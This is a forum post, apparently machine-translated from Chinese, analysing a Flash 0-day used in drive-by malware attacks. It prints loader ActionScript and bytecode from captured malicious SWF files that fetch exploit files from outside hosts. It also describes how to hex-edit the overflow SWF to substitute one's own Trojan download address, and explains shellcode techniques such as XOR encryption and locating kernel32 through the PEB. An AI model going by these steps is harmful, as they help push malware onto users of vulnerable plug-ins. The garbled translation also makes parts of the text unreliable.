By: the racle
Notes: ------------------------------------------ First must thank X. G. C. Team OPEN in a few key places to give my analysis,solution help. And we Forum several brothers to help. In the end, I only put this stuff to analyze it.. ------------------------------------------ The recent FLASH a few 0DAY,Forum also posts related news and information(please see:http://bbs.tian6.com/viewthread.php?tid=4434&extra=&page=1). I'm also about 5 days before the start of this study. I remember the time evil octal was also started the same study. So far,this 0DAY can affect the to 9 0. 1 1 5 This version. And the evil eight-over study,the first in two days ago, announced the successful completion. This in turn brings me no small pressure..
(A)as the study of preliminary,by TIM's help,I from several is hanging horse page get 2 SWF net horse. Decompile after that the two SWF in a local FLASH plug-in version,again download 2 Real with overflow and download the virus to the local execution ability of a malicious SWF file. It verify and download the SWF file of the detailed codes are visible as follows:
var fVersion = getVersion(); loadMovie("http://bao.5bao.net/123/" + fVersion + "i. swf", _root); stop ();
------------------------------------Here for the local FLASH version.------------------------------------- Description:load an external file command loadMovie()can play the SWF file at the same time, the external SWF file or JPEG file to load into Flash Player, so you can simultaneously display several SWF files, or in several SWF file to switch between[local]1[/local] 1, The loadMovie("url",target [, method]) "url" :to load the SWF file or JPEG file absolute path or a relative path. Use a relative path in General should be played. swf file to be loaded. swf files in the same folder. An absolute path must have a detailed path address. target: the target movie clip(mc element name and path. Target movie clip will be replaced by the loaded SWF file or image. method an optional parameter, generally not selected.
// [Action in Frame 1] _constantPool "fVersion" "/:$version" "http://xioayang,com/1 2 3/" "c. swf" "_root" _push "fVersion" "/:$version" _getVariable _var _push "http://xioayang,com/1 2 3/" "fVersion" _getVariable _add2 _push "c. swf" _add2 _push "_root" _getVariable _getURL2 flag 6 4 _stop _end -------------------------Get the version,configuration download address,download the real murderer. SWF.--------------------- Action in Frame 1 This action simultaneously opens the C. swf and push in the root.
According to the above,I downloaded the corresponding"WIN%209,0,45,0 ie. swf"is saved to the local,thus in total we got 4 samples SWF,2 of which are the overflow of the main SWF. Finally with available for comparative analysis documents of the capital.
(II)decompile overflow the main SWF,after we from the FLA saw this SWF consists of 3 tabs,1 Action,1 of a picture element,1 investigation. ! attachments/200805/30_191300_1.jpg By 2-ary comparison of our two samples,found to have a suspicious nature are picture elements and the investigation. Evil octal where research is considered part of the picture. And finally locked the picture in the section of the code. But regardless of the picture or that the investigation in the 1 6. are garbled. By several commonly used SHELLCODE encryption technology,I still can't restore the useful information..a few days ago I just start from here lose the direction. Part of the code in the screenshot shows: ! attachments/200805/30_191608_2.jpg ! attachments/200805/30_191622_3.jpg
(III)after a few days of thinking and of 0DAY principle of multiple ideas,we determine this FLASH0DAY principle is to let the user browse the SWF files,if the user's FLASH plug-in version is equal to or less than 1 1 5,then it will download and run the malicious SWF. Overflow,overflow,be in accordance with the small black to the Are you ready for the Trojans address the implementation download the+operation performed,then this Trojan address itself,necessarily present in this can overflow the SWF. The reason we 1 6 into the can not find this code located,because the SHELLCODE is encrypted. So how to find this location and determine the encryption method? Here we use reverse engineering. Reverse Engineering”,translated into Chinese is”reverse engineering”. I used the TRW,Soft-Ice and W32Dasm by constantly the important address of the breakpoint,continue the compilation of the debugging,analysis of the message response function,and finally the SHELLCODE locked in here:1 6-ary to open the main overflow SWF ! attachments/200805/30_191653_4.jpg Pay attention to the value of 6 2 of. From here,appear Trojans address. In the modified Trojan address before,put here the value was changed to 5 1. Then find: ! attachments/200805/30_191726_5.jpg This is the part to modify for your horse address. Such as: ! attachments/200805/30_191810_6.jpg At this point,you have successfully put the horse into his own.
(IV)we continue to explore this SHELLCODE encryption principles...this is also we can not find,can only rely on the reverse to gradually push the highwaymen stone. OPEN said This Is this SHELLCODE is preceded by Thunder 0day shellcode the same as the xor encryption way encryption. The following reference section XOR encryption and decryption principles: shellcode to be in someone else's computer to normal operation, note that the key: 1. All of the shellcode are difficult to guarantee their code is loaded into which memory address. shellcode to running, especially to read its own code in the data such as virus URL address to call the function name constants and variables, you have to be self-positioning, i.e. the acquisition itself in the memory of the virtual address. In General, as long as in the execution of shellcode in the process, can get into the program of the current entry point EIP value, will be able in order to locate their own code. However, the EIP value is not directly used in mov and other methods to obtain. To this end, the shellcode authors to use a typical way to you in the following shellcode will see. 2. shellcode must be in the same process space, call the system API function to complete the remote download the file and run the purpose. Then, how to get the function address? This is a remote injection code and a key: the function address relocation issues. As long as the API where the dll is the process of loading, it can be through by kernel32. dll export GetProcAddress to get the function address, then Call it. However, GetProcAddress is itself a function, we first have to get its address! Looks as if into the loop. That being the case, the shellcode authors must simulate the program to load the dll of the way, for their own shellcode code to create a similar“input table”. To get to kernel32. dll GetProcAddress the address of the function, it is necessary to read the kernel32. dll output table. So, the question becomes how to locate the kernel32. dll output table. The problem is transformed into a PE file structure read the question. As long as the Get kernel32. dll in the process virtual space of the base address of the DOS file header, i.e., MZ location, you can 03CH offset of read into the PE file header, the"E"word address relative to the DOS file header offset, and calculate the PE file header address. The PE file header structure 78H, is the output table address. By searching the output table, you can get the GetProcAddress function address offset, and further becomes in the virtual space of the entry point address. The problem layer by layer in-depth into how to get a“the kernel32. dll file in the process space of the base address of”. Hard-coding? Then you simply connected the function addresses are hard-coded, not saving it?! shellcode authors to have better practices. Speaking to the dll base address, a structure ready to--
PEB is! fs:[0x30] is!
Regarding the contention of this FLASH0DAY how to crack XOR encrypted SHELLCODE the way,I'm still not completely summarize after my operation. Summing over I and then supplements come in. Here the first listed two articles for your reference: